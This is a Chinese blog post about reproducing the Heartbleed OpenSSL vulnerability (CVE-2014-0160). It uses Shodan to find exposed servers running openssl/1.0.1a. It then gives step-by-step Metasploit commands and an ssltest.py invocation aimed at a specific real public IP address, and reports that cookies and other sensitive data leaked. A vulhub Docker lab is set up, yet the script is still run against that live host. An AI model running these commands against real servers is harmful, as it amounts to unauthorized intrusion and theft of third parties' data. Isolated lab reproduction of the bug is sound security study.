心脏滴血漏洞(CVE-2014-0160)复现

准备工作

  • 使用shodan搜索相关站点
    关键词:openssl/1.0.1a
    在这里插入图片描述
  • 访问地址

https://possible.lv/tools/hb/

进行在线测试搜索到的站点,查看是否存在漏洞
在这里插入图片描述

方法一:利用Metasploit进行渗透

  1. 开启Metasploit,查找心脏滴血漏洞并利用

msfconsole
search openssl_heartbleed
use auxiliary/scanner/ssl/openssl_heartbleed

在这里插入图片描述

  1. 配置源地址和源端口,IP地址为查找到的站点,端口号设为443,并执行run命令

show options
set RHOSTS 92.154.49.106
set RPORT 443
run

在这里插入图片描述
通过结果可以看到Heartbeat response with leak,证明漏洞存在

  1. 设置verbose 为true,输出进度条记录

set VERBOSE true
exploit

在这里插入图片描述
从结果可以看出我们可以利用该漏洞获取到cookie值等敏感信息

方法二:利用docker环境复现

  1. 进入vulhub目录选择环境

cd openssl/heartbleed/

在这里插入图片描述

  1. 编译并启动环境

docker-compose build
docker-compose up -d

  1. Python2运行ssltest.py,获取敏感数据
    IP地址为查询到的站点

python ssltest.py 92.154.49.106 -p 443

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值